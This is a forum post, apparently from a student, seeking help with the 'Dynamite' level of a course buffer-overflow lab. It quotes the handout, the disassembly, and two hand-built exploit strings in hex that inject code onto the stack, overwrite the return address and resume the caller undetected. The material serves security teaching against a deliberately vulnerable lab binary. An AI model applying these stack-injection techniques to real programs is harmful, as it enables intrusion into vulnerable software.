Buffer Bomb Level 3 (Dynamite)

I know this lab has been discussed many times here, and I have searched through all that I can find but am still not finding what I am looking for.  I am on the fourth phase of the Buffer Overflow Bomb and I am having some trouble.  Here is the pertinent info:
 

1 void test()
2 {
3 int val;
4 volatile int local = 0xdeadbeef;
5
6 val = getbuf();
7
8 /* Check for corrupted stack */
9 if (local != 0xdeadbeef) {
10 printf("Sabotaged!: the stack has been corrupted\n");
11 }
12 else if (val == cookie) {
13 printf("Boom!: getbuf returned 0x%x\n", val);
14 validate(3);
15 } else {
16 printf("Dud: getbuf returned 0x%x\n", val);
17 }
18 }

Select allOpen in new window

Our preceding attacks have all caused the program to jump to the code for some other function, which
then causes the program to exit. As a result, it was acceptable to use exploit strings that corrupt the stack,
overwriting saved values.
The most sophisticated form of buffer overflow attack causes the program to execute some exploit code that
changes the program’s register/memory state, but makes the program return to the original calling function
(test in this case). The calling function is oblivious to the attack. This style of attack is tricky, though,
since you must: 1) get machine code onto the stack, 2) set the return pointer to the start of this code, and 3)
undo any corruptions made to the stack state.
Your job for this level is to supply an exploit string that will cause getbuf to return your cookie back to
test, rather than the value 1. You can see in the code for test that this will cause the program to go
“Boom!.” Your exploit code should set your cookie as the return value, restore any corrupted state, push
the correct return location on the stack, and execute a ret instruction to really return to test.
Some Advice:
• You can use GDB to get the information you need to construct your exploit string. Set a breakpoint
within getbuf and run to this breakpoint. Determine parameters such as the saved return address.
• Determining the byte encoding of instruction sequences by hand is tedious and prone to errors. You
can let tools do all of the work by writing an assembly code file containing the instructions and data
you want to put on the stack. Assemble this file with GCC and disassemble it with OBJDUMP. You
should be able to get the exact byte sequence that you will type at the prompt. (A brief example of
how to do this is included at the end of this writeup.)
• Keep in mind that your exploit string depends on your machine, your compiler, and even your userid’s
cookie. Do all of your work on the class server, and make sure you include the proper userid on the
command line to BUFBOMB.
Once you complete this level, pause to reflect on what you have accomplished. You caused a program to
execute machine code of your own design. You have done so in a sufficiently stealthy way that the program
did not realize that anything was amiss.

Select allOpen in new window

 

08048b93 <getbuf>:
 8048b93:	55                   	push   %ebp  0x55685ff0
 8048b94:	89 e5                	mov    %esp,%ebp
 8048b96:	83 ec 28             	sub    $0x28,%esp
 8048b99:	8d 45 e0             	lea    0xffffffe0(%ebp),%eax
 8048b9c:	89 04 24             	mov    %eax,(%esp)
 8048b9f:	e8 3c ff ff ff       	call   8048ae0 <Gets>
 8048ba4:	b8 01 00 00 00       	mov    $0x1,%eax
 8048ba9:	c9                   	leave  
 8048baa:	c3                   	ret

Select allOpen in new window

08048c0f <test>:
 8048c0f:	55                   	push   %ebp
 8048c10:	89 e5                	mov    %esp,%ebp
 8048c12:	83 ec 18             	sub    $0x18,%esp
 8048c15:	c7 45 fc ef be ad de 	movl   $0xdeadbeef,0xfffffffc(%ebp)
 8048c1c:	e8 72 ff ff ff       	call   8048b93 <getbuf>
 8048c21:	89 c2                	mov    %eax,%edx
 8048c23:	8b 45 fc             	mov    0xfffffffc(%ebp),%eax
 8048c26:	3d ef be ad de       	cmp    $0xdeadbeef,%eax
 8048c2b:	74 0e                	je     8048c3b <test+0x2c>
 8048c2d:	c7 04 24 a8 a0 04 08 	movl   $0x804a0a8,(%esp)
 8048c34:	e8 7b fc ff ff       	call   80488b4 <puts@plt>
 8048c39:	eb 36                	jmp    8048c71 <test+0x62>
 8048c3b:	3b 15 e0 c1 04 08    	cmp    0x804c1e0,%edx
 8048c41:	75 1e                	jne    8048c61 <test+0x52>
 8048c43:	89 54 24 04          	mov    %edx,0x4(%esp)
 8048c47:	c7 04 24 2f a2 04 08 	movl   $0x804a22f,(%esp)
 8048c4e:	e8 f1 fb ff ff       	call   8048844 <printf@plt>
 8048c53:	c7 04 24 03 00 00 00 	movl   $0x3,(%esp)
 8048c5a:	e8 21 04 00 00       	call   8049080 <validate>
 8048c5f:	eb 10                	jmp    8048c71 <test+0x62>
 8048c61:	89 54 24 04          	mov    %edx,0x4(%esp)
 8048c65:	c7 04 24 4c a2 04 08 	movl   $0x804a24c,(%esp)
 8048c6c:	e8 d3 fb ff ff       	call   8048844 <printf@plt>
 8048c71:	c9                   	leave  
 8048c72:	c3                   	ret

Select allOpen in new window

Now, I have been trying a lot of things and recently I came up with a partial solution, but I need to know if I am on the right track.  I am also having an issue with getting it to work properly.  Without going through everything I have done so far, I will show where I am at currently.

I found that (based on the last level) I can write these instructions:
 

movl $0x583f74c2,0x804c1e8
pushl $0x08048c21
ret

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
c7 05 e8 c1 04 08 c2 74
3f 58 68 21 8c 04 08 c3
00 00 00 00 80 3e 68 55

Select allOpen in new window

Which will effectively write my cookie to a place in memory (global).  It then pushes the memory location of the next instruction in <test> just after <getbuf> is called, and returns to that function.  So I can get it to jump to my exploit code and back to where I want.

My issue is that I have been trying to write to %eax but get a segmentation fault every time.   I can write to memory but not to %eax.  This is what I was trying:

movl $0x583f74c2,%eax
pushl $0x08048c21
ret

00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00
00 00 00 00 00 b8 c2 74
3f 58 68 21 8c 04 08 c3
00 00 00 00 84 3e 68 55

Select allOpen in new window

I would appreciate any input I can get.
Thanks